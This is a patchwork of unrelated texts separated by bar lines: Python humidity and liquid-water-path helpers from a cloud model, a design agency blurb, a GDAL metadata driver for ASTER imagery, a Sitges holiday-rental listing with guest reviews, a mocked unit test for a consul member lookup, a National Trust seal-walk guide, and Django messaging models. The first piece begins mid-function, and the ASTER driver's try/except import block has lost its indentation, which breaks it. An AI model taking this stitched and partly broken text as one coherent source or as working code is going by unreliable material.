        return -999.
    #
    # The lowest LWP when RH=0% at the surface
    rw_min=0.
    lwp_min,zb,zc,clw_max=calc_lwp(p_surf,theta,pblh,rw_min)
    if lwp_min>lwp:
        # Bug fix: the original message printed lwp_max here instead of lwp_min
        if debug: print('Too low LWP (%5.1f g/m2), the minimum is %5.1f g/m2 (theta=%6.2f K, pblh=%3.0f hPa)' % (lwp*1e3, lwp_min*1e3,theta,pblh/100.))
        return -999.
    #
    # Bisection between rw_min and rw_max
    k=0
    while k<100:
        rw_new=(rw_min+rw_max)*0.5
        lwp_new,zb,zc,clw_max=calc_lwp(p_surf,theta,pblh,rw_new)
        #
        if abs(lwp-lwp_new)<tol or abs(rw_max-rw_min)<0.001e-3:
            return rw_new
        elif lwp<lwp_new:
            rw_max=rw_new
        else:
            rw_min=rw_new
        k+=1
    #
    # Failed to converge within 100 iterations
    if debug: print('Iteration failed: current LWP=%5.1f, target LWP=%5.1f' % (lwp_new*1e3,lwp*1e3))
    return -999.
def solve_q_inv_RH(press,tpot,q,max_RH):
    # Adjust the total water mixing ratio so that the calculated RH does not exceed
    # the given limit. This can be used to increase a humidity inversion so that RH
    # above cloud stays below 100%. Typical inputs:
    #   press [Pa]  = p_surf - pblh
    #   tpot [K]    = tpot_pbl + tpot_inv
    #   q [kg/kg]   = q_pbl - q_inv
    #   max_RH [%]  = 98.
    # Returns (adjusted q, its RH, original RH); q and RH are -999. on failure.
    #
    # Constants
    R=287.04  # Specific gas constant for dry air (R_specific=R/M), J/kg/K
    cp=1005.0 # Specific heat for a constant pressure
    p00=1.0e+05
    #
    # Absolute temperature (K) from potential temperature
    temp=tpot*(press/p00)**(R/cp)
    #
    # Current RH (%)
    rh=calc_rh(q,temp,press)
    #
    # Nothing to do when RH is already within the limit
    if rh<=max_RH:
        return q, rh, rh
    #
    # Bisection for q such that RH == max_RH
    lo, hi = 0., q
    for _ in range(200):
        mid=0.5*(lo+hi)
        rh_mid=calc_rh(mid,temp,press)
        #
        if abs(rh_mid-max_RH)<0.001:
            return mid, rh_mid, rh
        if rh_mid>max_RH:
            hi=mid
        else:
            lo=mid
    #
    # Failed to converge
    print('Failed to solve water vapor mixing ratio from given RH!')
    return -999.,-999., rh
#
#
#
# ================ Helper functions ================
#
def ls_fit(xx,yy):
    # Simple linear least squares fit: y=a+b*x
    #
    # Inputs:
    #   xx, yy   Sequences of x and y values; pairs where either value is NaN are ignored
    #
    # Returns a, b, a_std, b_std where a_std/b_std are the parameter standard
    # deviations (0.0 when fewer than 3 valid points).
    #
    # Fixes: numpy.asscalar was removed in NumPy 1.23 (replaced by float()), and the
    # deprecated numpy.matrix algebra is replaced by numpy.linalg.lstsq on arrays.
    import numpy
    #
    # Ignore pairs containing NaN's
    xx=numpy.asarray(xx,dtype=float)
    yy=numpy.asarray(yy,dtype=float)
    mask=~(numpy.isnan(xx)|numpy.isnan(yy))
    x=xx[mask]
    y=yy[mask]
    #
    if len(x)<=1:
        # Not enough points for a fit: return the identity line
        a=0.0; a_std=0.0
        b=1.0; b_std=0.0
    else:
        # Design matrix H=[1, x] and LS solution of H*th=y
        H=numpy.vstack([numpy.ones(len(x)),x]).T
        th,_res,_rank,_sv=numpy.linalg.lstsq(H,y,rcond=None)
        a=float(th[0])
        b=float(th[1])
        # Parameter uncertainty (needs at least 3 points)
        if len(x)>2:
            # Residual variance
            r=y-H.dot(th)
            sv2=r.dot(r)/(len(x)-2)
            std=numpy.sqrt( sv2*numpy.diagonal( numpy.linalg.inv( H.T.dot(H) ) ) )
            a_std=float(std[0])
            b_std=float(std[1])
        else:
            a_std=0.0
            b_std=0.0
    #
    return a,b,a_std,b_std
def average_scaled(x,y):
    # Calculate the mean and standard deviation of the ratios x/y, ignoring points
    # where y=0. Returns (-999., -999.) with no valid points and (value, -999.)
    # with a single valid point.
    import numpy
    # Collect the valid ratios
    ratios=[xi/yi for xi,yi in zip(x,y) if yi>0.]
    n=len(ratios)
    #
    if n==0:
        return -999., -999.
    if n==1:
        return ratios[0], -999.
    # Mean and (population) standard deviation
    mean=sum(ratios)/n
    mean_sq=sum(r*r for r in ratios)/n
    return mean, numpy.sqrt( mean_sq - mean**2 )
#
# Functions from the LES model
#
def calc_psat_w(T):
    # Saturation vapor pressure (Pa) of liquid water as a function of temperature (K).
    #
    # Eighth-order polynomial fit from the LES model (thrm.f90: real function rslf),
    # evaluated in Horner form; the argument is clamped at -80 C below freezing.
    coeffs=(0.6105851e+03, 0.4440316e+02, 0.1430341e+01, 0.2641412e-01,
            0.2995057e-03, 0.2031998e-05, 0.6936113e-08, 0.2564861e-11,
            -.3704404e-13)
    #
    x=max(-80.,T-273.16)
    psat=0.0
    for c in reversed(coeffs):
        psat=psat*x+c
    return psat
def calc_sat_mixr(p,T):
    # Saturation mixing ratio for water (kg/kg) at pressure p (Pa) and temperature T (K).
    #
    # Based on the LES model (thrm.f90: real function rslf):
    #   r = m_w/m_air, and the 0.622 factor is R_dry/R_vapor = 287.04/461.5
    esat=calc_psat_w(T)
    return .622*esat/(p-esat)
def calc_rh(rw,T,press):
    # Relative humidity (%) from water vapor mixing ratio rw (r=m_w/m_air [kg/kg]),
    # temperature (K) and pressure (Pa).
    #
    # r = pw/(p-pw)*R/Rm  =>  pw = p*r/(R/Rm+r), and RH = pw/psat*100
    eps=287.04/461.5  # R_dry/R_vapor
    pw=press*rw/(eps+rw)  # Partial pressure of water vapor (Pa)
    return pw/calc_psat_w(T)*100
# When ep>>rw => RH=press*rw/(ep*psat)*100
# ================================
|
We design things for the world of healthcare communications. This could mean an identity for a charity like Heart UK, a patient campaign, a toolkit for professionals working in intensive care or an online interactive educational module for oncology nursing. We also help get these produced, get them in place on time and in budget. Whatever the project, we get a buzz from making something work and bringing our clients' ideas to life.
|
# -*- coding: utf-8 -*-
# Copyright (c) 2013 Australian Government, Department of the Environment
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
Metadata driver for ASTER imagery
B{Format specifications}:
- U{http:#www.gdal.org/frmt_hdf4.html}
- U{http://asterweb.jpl.nasa.gov/documents/ASTER_L1_Product_Spec_Ver_1.3_July01.pdf}
- U{http://asterweb.jpl.nasa.gov/content/03_data/04_Documents/ASTER_L1_Product_Spec_Ver_1.3_July01.pdf} (inc description of GCTP projection parameters)
- U{http://lpdaac.usgs.gov/aster/ASTER_GeoRef_FINAL.pdf}
- U{http://www.science.aster.ersdac.or.jp/en/documnts/users_guide/index.html}
- U{http://www.science.aster.ersdac.or.jp/en/documnts/pdf/ASTER_Ref_V1.pdf}
'''
format_regex=[r'ast_l1[ab].*\.hdf$',r'pg-PR1[AB]0000-\d{10}_\d{3}_\d{3}$'] #HDF inc. ASTER
'''Regular expression list of file formats'''
#import base dataset module
import __dataset__
# import other modules (use "_" prefix to import privately)
import sys, os, re, glob, time, math, string
from metageta import utilities, geometry, spatialreferences
try:
from osgeo import gdal
from osgeo import gdalconst
from osgeo import osr
from osgeo import ogr
except ImportError:
import gdal
import gdalconst
import osr
import ogr
gdal.AllRegister()
class Dataset(__dataset__.Dataset): #Subclass of base Dataset class
    '''Metadata driver for Terra/ASTER Level 1A/1B HDF imagery.'''
    def __init__(self,f=None):
        '''Open the HDF file and bail out early if it is not an ASTER product.'''
        if not f:f=self.fileinfo['filepath']
        # GDAL virtual filesystem paths are not supported by this driver
        if f[:4]=='/vsi':raise NotImplementedError
        self.filelist=glob.glob(os.path.splitext(f)[0]+'.*')
        self._gdaldataset = geometry.OpenDataset(f)
        self._hdf_md=self._gdaldataset.GetMetadata()
        if not self._hdf_md.get('INSTRUMENTSHORTNAME')=='ASTER':
            raise NotImplementedError #This error gets ignored in __init__.Open()
    def __getmetadata__(self,f=None):
        '''Read Metadata for ASTER HDF images as GDAL doesn't.'''
        if not f:f=self.fileinfo['filepath']
        # Only the 'ImageData' subdatasets hold band rasters
        hdf_sd=self._gdaldataset.GetSubDatasets()
        hdf_sd= [sd for sd,sz in hdf_sd if 'ImageData' in sd]
        hdf_md=self._hdf_md
        #sd,sz = hdf_sd[0]
        sd = hdf_sd[0]
        sd=geometry.OpenDataset(sd)
        nbands=len(hdf_sd)
        # Per-band lists; joined into comma separated strings below
        ncols=[]
        nrows=[]
        nbits=[]
        bands=[]
        datatypes=[]
        cellxy=[]
        # PROCESSEDBANDS is a string of 2-character band codes; the first 4 bands
        # are VNIR (15m cells), the next 6 SWIR (30m), the rest TIR (90m)
        for i in range(0,len(hdf_md['PROCESSEDBANDS']), 2):
            band=hdf_md['PROCESSEDBANDS'][i:i+2]
            if i/2+1 <= 4:
                bands.append('VNIR'+band)
                cellxy.append('15')
            elif i/2+1 <= 10:
                bands.append('SWIR'+band)
                cellxy.append('30')
            else:
                bands.append('TIR'+band)
                cellxy.append('90')
            if band.isdigit():band=str(int(band)) #Get rid of leading zero
            cols,rows,bytes=map(int,hdf_md['IMAGEDATAINFORMATION%s' % band].split(','))
            if bytes==1:datatypes.append('Byte')
            elif bytes==2:datatypes.append('UInt16')
            ncols.append(str(cols))
            nrows.append(str(rows))
            nbits.append(str(bytes*8))
        ncols=','.join(ncols)
        nrows=','.join(nrows)
        nbits=','.join(nbits)
        bands=','.join(bands)
        datatypes=','.join(datatypes)
        cellxy=','.join(cellxy)
        # Scene corner coordinates from the HDF metadata (given as "lat,lon")
        uly,ulx=[float(xy) for xy in hdf_md['UPPERLEFT'].split(',')]
        ury,urx=[float(xy) for xy in hdf_md['UPPERRIGHT'].split(',')]
        lry,lrx=[float(xy) for xy in hdf_md['LOWERRIGHT'].split(',')]
        lly,llx=[float(xy) for xy in hdf_md['LOWERLEFT'].split(',')]
        ext=[[ulx,uly],[urx,ury],[lrx,lry],[llx,lly],[ulx,uly]]
        #SRS reported by GDAL is slightly dodgy, GDA94 is not recognised and doesn't set the North/South properly
        #Get it anyway so we can work out if it's GDA94 based on the spheroid
        srs=sd.GetGCPProjection()
        src_srs=osr.SpatialReference(srs)
        tgt_srs=osr.SpatialReference()
        geogcs=osr.SpatialReference()
        if src_srs.GetAttrValue('SPHEROID') == 'GRS 1980':geogcs.ImportFromEPSG(4283) #Assume 'GDA94'
        else:geogcs.ImportFromEPSG(4326) #Assume 'WGS84'
        tgt_srs.CopyGeogCSFrom(geogcs)
        if hdf_md['PROCESSINGLEVELID'].upper()=='1A':
            # Level 1A is unprojected (geographic coordinates)
            units='deg'
        else:
            #projparams=map(float, hdf_md['PROJECTIONPARAMETERS1'].split(','))
            if hdf_md['MPMETHOD1'] == 'UTM':#Universal Transverse Mercator
                if uly < 0:bNorth=False #GDAL doesn't set the North/South properly
                else:bNorth=True
                nZone = int(hdf_md['UTMZONECODE1'])
                tgt_srs.SetUTM(nZone,bNorth)
                units='m'
            #Other projections not (yet?) implemented...
            #elif hdf_md['MPMETHOD1'] == 'PS':#Polar Stereographic
            #    #dfCenterLon = ? GTCP projection params don't list cenlon/lat for PS
            #    dfCenterLat = ?
            #    dfScale = ?
            #    tgt_srs.SetPS(dfCenterLat,dfCenterLon,dfScale,0.0,0.0)
            #elif hdf_md['MPMETHOD1'] == 'LAMCC':#Lambert Conformal Conic
            #    dfCenterLon = ?
            #    dfCenterLat = ?
            #    dfStdP1 = ?
            #    dfStdP2 = ?
            #    tgt_srs.SetLCC(dfStdP1,dfStdP2,dfCenterLat,dfCenterLon,0,0)
            #elif hdf_md['MPMETHOD1'] == 'SOM':#Space Oblique Mercator
            #    dfCenterLon = ?
            #    dfCenterLat = ?
            #    srs.SetMercator(dfCenterLat,dfCenterLon,0,0,0)
            #elif hdf_md['MPMETHOD1'] == 'EQRECT':#Equi-Rectangular
            #    dfCenterLon = ?
            #    dfCenterLat = ?
            #    tgt_srs.SetMercator(dfCenterLat,dfCenterLon,0,0,0)
            else: #Assume Geog
                units='deg'
        srs=tgt_srs.ExportToWkt()
        self.metadata['UL']='%s,%s' % tuple(ext[0])
        self.metadata['UR']='%s,%s' % tuple(ext[1])
        self.metadata['LR']='%s,%s' % tuple(ext[2])
        self.metadata['LL']='%s,%s' % tuple(ext[3])
        self.metadata['metadata']='\n'.join(['%s: %s' %(m,hdf_md[m]) for m in hdf_md])
        self.metadata['satellite']='Terra'
        self.metadata['sensor']='ASTER'
        self.metadata['filetype'] = self._gdaldataset.GetDriver().ShortName+'/'+self._gdaldataset.GetDriver().LongName + ' (ASTER)'
        self.metadata['sceneid'] = hdf_md['ASTERSCENEID']
        self.metadata['level'] = hdf_md['PROCESSINGLEVELID']
        # Normalise the acquisition date/time to ISO 8601
        if '-' in hdf_md['CALENDARDATE']:imgdate = hdf_md['CALENDARDATE']
        else:imgdate = time.strftime(utilities.dateformat,time.strptime(hdf_md['CALENDARDATE'],'%Y%m%d')) #ISO 8601
        imgtime = hdf_md.get('TIMEOFDAY')
        if imgtime:self.metadata['imgdate'] = time.strftime(utilities.datetimeformat,time.strptime(imgdate+imgtime[0:6],'%Y-%m-%d%H%M%S')) #ISO 8601
        else:self.metadata['imgdate'] = imgdate
        #self.metadata['imgdate'] = hdf_md['CALENDARDATE']
        self.metadata['cloudcover'] = float(hdf_md['SCENECLOUDCOVERAGE'])
        if hdf_md['FLYINGDIRECTION']=='DE':self.metadata['orbit'] = 'Descending'
        else:self.metadata['orbit'] = 'Ascending'
        self.metadata['rotation']=float(hdf_md.get('MAPORIENTATIONANGLE',hdf_md.get('SCENEORIENTATIONANGLE')))
        if abs(self.metadata['rotation']) < 1.0: self.metadata['orientation']='Map oriented'
        else: self.metadata['orientation']='Path oriented'
        self.metadata['sunazimuth'],self.metadata['sunelevation']=map(float,hdf_md['SOLARDIRECTION'].split(','))
        self.metadata['viewangle'] = float(hdf_md['POINTINGANGLE'])
        self.metadata['cols'] = ncols
        self.metadata['rows'] = nrows
        self.metadata['nbands'] = nbands
        self.metadata['datatype'] = datatypes
        self.metadata['nbits'] = nbits
        self.metadata['nodata']=','.join(['0' for i in range(0,nbands)])
        self.metadata['bands'] = bands
        self.metadata['resampling'] = hdf_md.get('RESMETHOD1') #Assume same for all...
        self.metadata['srs']= srs
        self.metadata['epsg']= spatialreferences.IdentifyAusEPSG(srs)
        self.metadata['units']= units
        self.metadata['cellx'],self.metadata['celly']=cellxy,cellxy
        #Geotransform
        # NOTE(review): per-band cell sizes are recomputed below from corner GCPs,
        # and srs/UL/UR/LR/LL set above are overwritten with EPSG:4326 values
        ext=[[ulx,uly],[urx,ury],[lrx,lry],[llx,lly],[ulx,uly]]
        ncols=map(int, str(ncols).split(','))
        nrows=map(int, str(nrows).split(','))
        cellx,celly=[],[]
        j=0
        while j < len(ncols):
            # Build 4 corner GCPs for band j and derive its cell size
            gcps=[];i=0
            lr=[[0,0],[ncols[j],0],[ncols[j],nrows[j]],[0,nrows[j]]]
            while i < len(ext)-1: #don't need the last xy pair
                gcp=gdal.GCP()
                gcp.GCPPixel,gcp.GCPLine=lr[i]
                gcp.GCPX,gcp.GCPY=ext[i]
                gcp.Id=str(i)
                gcps.append(gcp)
                i+=1
            j+=1
            geotransform = gdal.GCPsToGeoTransform(gcps)
            x,y=geometry.CellSize(geotransform)
            cellx.append(str(x))
            celly.append(str(abs(y)))
        self.metadata['cellx']=','.join(cellx)
        self.metadata['celly']=','.join(celly)
        srs=osr.SpatialReference()
        srs.ImportFromEPSG(4326)
        self.metadata['srs']= srs.ExportToWkt()
        self.metadata['UL']='%s,%s' % tuple(ext[0])
        self.metadata['UR']='%s,%s' % tuple(ext[1])
        self.metadata['LR']='%s,%s' % tuple(ext[2])
        self.metadata['LL']='%s,%s' % tuple(ext[3])
        self.metadata['metadata']='\n'.join(['%s: %s' %(m,hdf_md[m]) for m in hdf_md])
        self.metadata['filesize']=sum([os.path.getsize(file) for file in self.filelist])
        self.metadata['compressionratio']=0
        self.metadata['compressiontype']='None'
        self.extent=ext
        #Build gdaldataset object for overviews
        vrtcols=ncols[0]
        vrtrows=nrows[0]
        #vrtbands=[sd for sd,sn in hdf_sd[0:4]]#The 4 VNIR bands
        vrtbands=hdf_sd[0:4]#The 4 VNIR bands
        vrt=geometry.CreateSimpleVRT(vrtbands,vrtcols,vrtrows,datatypes.split(',')[0])
        self._gdaldataset=geometry.OpenDataset(vrt)
        for i in range(1,5):
            self._gdaldataset.GetRasterBand(i).SetNoDataValue(0)
|
This short-term rental loft has an area of 35m2 and is located in a building with elevator on the first floor. The entire apartment has been renovated and decorated by the interior design studio GrupTell 1936. It can accommodate three people in a room with double bed, and a bunk bed in the living-room area. The bathroom is modern, and the large kitchen is equipped with washing machine, microwave, coffee machine, kettle and fridge/freezer. The apartment has TV, Wi-Fi, heating, air conditioning, sheets, blankets and towels.
This holiday Accommodation is part of the same building as Montroig 2, in the so-called Street of sin (Marqués de Montroig), the clubbing street of Sitges. This picturesque town of Sitges is 35km south of Barcelona, a medieval town lining the coast. The Old town, located on a hill around the San Bartolomé y Santa Tecla church (XVII), offers a stunning architectural and cultural heritage. It is also worth noting the beautiful La Ribera beach, frequented both by locals and tourists, with its golden fine sand and its calm waves.
A great location, only a few minutes walk to the beach, 10 minutes walk to the train station and 5 minutes drive to the highway that will take you to Barcelona and 20 to 30 minutes drive to Barcelona’s International Airport El Prat (30km).
• Mile i sympatyczne wczasy spedzilem w tym apartamecie.
• Very few facilities. No microwave. Only one bin bag for a week, no toilet detergent and absolutely no shower gel or shampoo. I arrived late, so it was difficult to buy these things until the next day. I booked an apartment so I could use the washing machine, but there were no clothes pegs!!! Small things that could have made a big difference.
• mixed experience… • The flat was quite well furnished (lots of storage), and the bed comfortable….
• An excellent location, in central Sitges, with good facilities – but very quiet! The keyholder / local agent was very accommodating when it came to checking in and out.
• The wifi was a little temperamental, but that’s our only complaint.
• Locatie is perfect maar elke keer als je wifi vraagt krijg je een connectie om suikerziekte op te lopen. Ik spreek in het algemeen En dat vinden de eigenaars in Sitges niet zo belangrijk.
• Je voelt je opgesloten in het appartement. Misschien hebben de andere gasten meer geluk dan ik omdat ze een balkon on een terras hadden maar ik voelde me wel opgesloten.
|
from raptiformica.distributed.members import try_get_members_list
from tests.testcase import TestCase
class TestTryGetMembersList(TestCase):
    """Unit tests for raptiformica.distributed.members.try_get_members_list"""
    def setUp(self):
        # Patch the distributed command runner so no remote command is actually
        # executed; simulate a successful 'consul members' run on the second host
        self.try_machine_command = self.set_up_patch('raptiformica.distributed.members.try_machine_command')
        self.try_machine_command.return_value = ('output', '5.6.7.8', '22')
        # Candidate (host, port) pairs that should be tried in order
        self.host_and_port_pairs = [
            ('1.2.3.4', '2222'),
            ('5.6.7.8', '22')
        ]
    def test_try_get_members_list_tries_machine_command(self):
        # The consul members command must be attempted on the provided hosts
        # with the expected progress and failure messages
        try_get_members_list(self.host_and_port_pairs)
        expected_command = ['consul', 'members']
        self.try_machine_command.assert_called_once_with(
            self.host_and_port_pairs,
            expected_command,
            attempt_message="Trying to get members list from {}:{}",
            all_failed_message="Could not list members in the distributed network. "
                               "Maybe no meshnet has been established yet. "
                               "Do you have at least three machines running?"
        )
    def test_try_get_members_list_returns_output_from_first_successful_members_list(self):
        # Only the command output (first tuple element) should be returned
        ret = try_get_members_list(self.host_and_port_pairs)
        self.assertEqual(ret, 'output')
|
Experience the Horsey Broadland landscape with the National Trust, on this 3 mile return walk to the beach, following grassy paths and tracks, encompassing low-lying grazing marshes, sand dunes and a narrow sandy beach, with a chance of seeing Grey Seals.
Please note that this walk has been made possible with kind permission from the Buxton family who manage it.
Horsey Windpump, Great Yarmouth, Norfolk NR29 4EF.
From the car park head back towards the entrance and visit Horsey Staithe Stores (Mar-Nov) for information on the area, a warm welcome and a quick cup of tea or coffee. From the Stores, cross the road (please take care) and go through the gates immediately opposite.
Standing sentinel over the moorings at the Staithe, the last tower mill built in the Broads in 1912 offers superb views over Horsey mere and the surrounding countryside and coast. Set within the Broads National Park, the Horsey Estate is an internationally important site for wildlife. It offers a great spot for bird-watching and for wintering wildfowl.
Head straight across the field for 0.3 miles (480 metres) keeping the ditch on your left. Be aware that there may be livestock in the fields, which help to keep the grass short suitable for breeding and over-wintering birds such as waders and geese.
At the end of the field turn left and go over a stile and walk for 0.1 miles (167 metres). This field could also hold livestock and then continue onto a track for 300 metres (0.2 miles).
At the end of the track turn right onto a narrow lane and at the junction of two red brick cottages continue past a barrier to follow a grassy track.
Follow the track for 0.4 miles (650 metres). The small fields either side are much wetter. In the summer months looks for butterflies and dragonflies. These marshes are much more closed-in structure hiding wildlife such as lapwings, red-shanks and small mammals. You can see the old network of drainage channels that dissect the area.
The Horsey Estate, a mysterious Broadland landscape, is internationally important for its habitats and wealth of wildlife some of which is unique to the area such as Britain’s largest butterfly the Swallowtail. The Estate was acquired by the National Trust in 1948 from the Buxton family who continue to manage the Horsey Estate to this day. This walk has been made possible by kind permission of the Horsey Estate Trust.
You have now reached the sand dunes that run along this stretch of the coast. Follow designated access tracks that lead up and over them. Grey seals can often be seen here. Please give them a wide berth and keep any dogs under control. In the winter the Friends of Horsey seals are on hand to talk about the seal pups and to give information on how to see them. Please note that the beach is closed October to January to provide a wildlife sanctuary.
Both species of seal that live in the UK can be seen on the beach at Horsey. Common seals, despite their name, are fewer in number than the larger Grey seals and are more often seen outside the Grey seal pupping season. The Grey seals come to pup on the beach between October and March. The white-coated pups are very vulnerable and are completely reliant on their mother's milk until they are weaned and have developed their waterproof coats.
After walking the beach, return to Horsey Staithe Stores via the same route. The Nelson Head Pub is located just a little inland along the lane at Point 4. When you reach the road next to the Stores take care crossing it. Toilets are in the car park.
There is one stile on the route and marshes can become muddy and wet outside the summer months. Suitable footwear will be necessary. For guidance on how to see the seals without disturbing them please refer to www.friendsofhorseyseals.co.uk. Please give seals a wide berth and follow any information and signs on the site. For more information please visit www.friendsofhorseyseals.co.uk. Dogs welcome but need to be kept on leads or close control, especially when crossing fields with livestock. Please respect other visitors. Please 'Bag and bin'.
On B1159, 22 miles (35.2km) east of Norwich taking A47 via Acle and Martham, or 11.6 miles (18.7km) north of Great Yarmouth. Postcode NR29 4EF.
2.5 miles (4km) from West Somerton; 4 miles (6.4km) from Winterton on Sea, via public paths and highway.
Hire craft at Potter Heigham, Martham and Whispering Reeds, Hickling. Access to Horsey Mere via Meadow Dyke from Heigham Sound and river network. NOTE: please avoid Mere Nov-Mar to avoid disturbing the wildfowl refuge.
Parking - NT Pay & Display car park & drop-off point.
WC's - NT toilets, accessible toilet & shower.
Food and drink: Horsey Staithe Stores (next to Horsey Windpump) - March-November for snacks and light refreshments. See website for opening times. Nelson Head public house and restaurant is open from 11am.
Experience the Broadland landscape and wealth of wildlife of the Horsey Estate, with its Mere, reedbeds, marshes and drainage mills on this circular estate walk.
|
"""models for the ``group_messaging`` app
"""
import copy
import datetime
import urllib
from askbot.mail import send_mail #todo: remove dependency?
from django.template.loader import get_template
from django.db import models
from django.db.models import signals
from django.conf import settings as django_settings
from django.contrib.auth.models import Group
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from django.utils.importlib import import_module
from django.utils.translation import ugettext as _
#maximum lengths of a few denormalized text fields (see the Message model)
MAX_HEADLINE_LENGTH = 80
MAX_SENDERS_INFO_LENGTH = 64
MAX_SUBJECT_LINE_LENGTH = 30
#dummy parse message function
#identity for now - todo: plug in real text-to-html rendering here
parse_message = lambda v: v
#name template for the hidden single-member "personal" groups, keyed by user id
GROUP_NAME_TPL = '_personal_%s'
def get_recipient_names(recipient_groups):
    """Return a set of display names for the given groups:
    the single member's username for "personal" groups,
    the group name for all others.
    """
    return set(
        group.user_set.all()[0].username
        if group.name.startswith('_personal_')
        else group.name
        for group in recipient_groups
    )
def get_personal_group_by_user_id(user_id):
    """Fetch the personal group whose name encodes *user_id*."""
    personal_name = GROUP_NAME_TPL % user_id
    return Group.objects.get(name=personal_name)
def get_personal_groups_for_users(users):
    """Return a queryset with the personal groups of the given users."""
    wanted_names = [GROUP_NAME_TPL % member.id for member in users]
    return Group.objects.filter(name__in=wanted_names)
def get_personal_group(user):
    """returns personal group for the user
    (thin wrapper over :func:`get_personal_group_by_user_id`)"""
    return get_personal_group_by_user_id(user.id)
def create_personal_group(user):
    """Create, save and return the personal group for *user*."""
    personal = Group(name=GROUP_NAME_TPL % user.id)
    personal.save()
    return personal
class LastVisitTime(models.Model):
    """just remembers when a user has
    last visited a given thread
    """
    #visiting user
    user = models.ForeignKey(User)
    #thread root message that was visited
    message = models.ForeignKey('Message')
    #set once on creation; updated by callers re-creating/saving the record
    at = models.DateTimeField(auto_now_add=True)

    class Meta:
        #one timestamp record per (user, thread) pair
        unique_together = ('user', 'message')
class SenderListManager(models.Manager):
    """model manager for the :class:`SenderList`"""

    def get_senders_for_user(self, user=None):
        """returns query set of :class:`User` who have sent
        messages to any of the groups the given user belongs to
        """
        user_groups = user.groups.all()
        #sender lists whose recipient group is one of the user's groups
        lists = self.filter(recipient__in=user_groups)
        user_ids = lists.values_list(
            'senders__id', flat=True
        ).distinct()
        return User.objects.filter(id__in=user_ids)
class SenderList(models.Model):
    """a model to store denormalized data
    about who sends messages to any given person
    sender list is populated automatically
    as new messages are created
    """
    #NOTE(review): ForeignKey(unique=True) is effectively a OneToOneField -
    #consider migrating; verify against the Django version in use first
    recipient = models.ForeignKey(Group, unique=True)
    #users who have ever sent a message to this recipient group
    senders = models.ManyToManyField(User)
    objects = SenderListManager()
class MessageMemo(models.Model):
    """A bridge between message recipients and messages
    these records are only created when user sees a message.
    The idea is that using groups as recipients, we can send
    messages to massive numbers of users, without cluttering
    the database.
    Instead we'll be creating a "seen" message after user
    reads the message.
    """
    #user has read the message
    SEEN = 0
    #user has archived (soft-deleted) the message
    ARCHIVED = 1
    STATUS_CHOICES = (
        (SEEN, 'seen'),
        (ARCHIVED, 'archived')
    )
    user = models.ForeignKey(User)
    message = models.ForeignKey('Message', related_name='memos')
    status = models.SmallIntegerField(
        choices=STATUS_CHOICES, default=SEEN
    )

    class Meta:
        #at most one memo per (user, message) pair
        unique_together = ('user', 'message')
class MessageManager(models.Manager):
    """model manager for the :class:`Message`"""

    def get_sent_threads(self, sender=None):
        """returns query set of threads for the "sent" mailbox
        this function does not deal with deleted=True
        """
        #responses authored by the sender
        responses = self.filter(sender=sender)
        #root messages that received one of those responses
        responded_to = models.Q(descendants__in=responses, root=None)
        seen_filter = models.Q(
            memos__status=MessageMemo.SEEN,
            memos__user=sender
        )
        seen_responses = self.filter(responded_to & seen_filter)
        unseen_responses = self.filter(responded_to & ~models.Q(memos__user=sender))
        #threads started by the sender plus threads the sender responded to
        return (
            self.get_threads(sender=sender) \
            | seen_responses.distinct() \
            | unseen_responses.distinct()
        ).distinct()

    def get_threads(self, recipient=None, sender=None, deleted=False):
        """returns query set of first messages in conversations,
        based on recipient, sender and whether to
        load deleted messages or not"""
        if sender and sender == recipient:
            raise ValueError('sender cannot be the same as recipient')

        filter_kwargs = {
            'root': None,
            'message_type': Message.STORED
        }
        if recipient:
            filter_kwargs['recipients__in'] = recipient.groups.all()
        else:
            #todo: possibly a confusing hack - for this branch -
            #sender but no recipient in the args - we need "sent" origin threads
            recipient = sender

        user_thread_filter = models.Q(**filter_kwargs)
        #named `thread_filter` rather than `filter` to avoid shadowing the builtin
        thread_filter = user_thread_filter
        if sender:
            thread_filter = thread_filter & models.Q(sender=sender)

        if deleted:
            deleted_filter = models.Q(
                memos__status=MessageMemo.ARCHIVED,
                memos__user=recipient
            )
            return self.filter(thread_filter & deleted_filter)
        else:
            #rather a tricky query (may need to change the idea to get rid of this)
            #select threads that have a memo for the user, but the memo is not ARCHIVED
            #in addition, select threads that have zero memos for the user
            marked_as_non_deleted_filter = models.Q(
                memos__status=MessageMemo.SEEN,
                memos__user=recipient
            )
            #part1 - marked as non-archived
            part1 = self.filter(thread_filter & marked_as_non_deleted_filter)
            #part2 - messages for the user without an attached memo
            part2 = self.filter(thread_filter & ~models.Q(memos__user=recipient))
            return (part1 | part2).distinct()

    def create(self, **kwargs):
        """creates a message, deriving ``root``, ``headline``
        and the rendered ``html`` fields along the way"""
        root = kwargs.get('root', None)
        if root is None:
            parent = kwargs.get('parent', None)
            if parent:
                if parent.root:
                    root = parent.root
                else:
                    root = parent
            kwargs['root'] = root

        headline = kwargs.get('headline', kwargs['text'])
        kwargs['headline'] = headline[:MAX_HEADLINE_LENGTH]
        kwargs['html'] = parse_message(kwargs['text'])

        message = super(MessageManager, self).create(**kwargs)
        #creator of message saw it by definition
        #create a "seen" memo for the sender, because we
        #don't want to inform the user about his/her own post
        sender = kwargs['sender']
        MessageMemo.objects.create(
            message=message, user=sender, status=MessageMemo.SEEN
        )
        return message

    def create_thread(self, sender=None, recipients=None, text=None):
        """creates a stored message and adds recipients"""
        message = self.create(
            message_type=Message.STORED,
            sender=sender,
            senders_info=sender.username,
            text=text,
        )
        now = datetime.datetime.now()
        LastVisitTime.objects.create(message=message, user=sender, at=now)
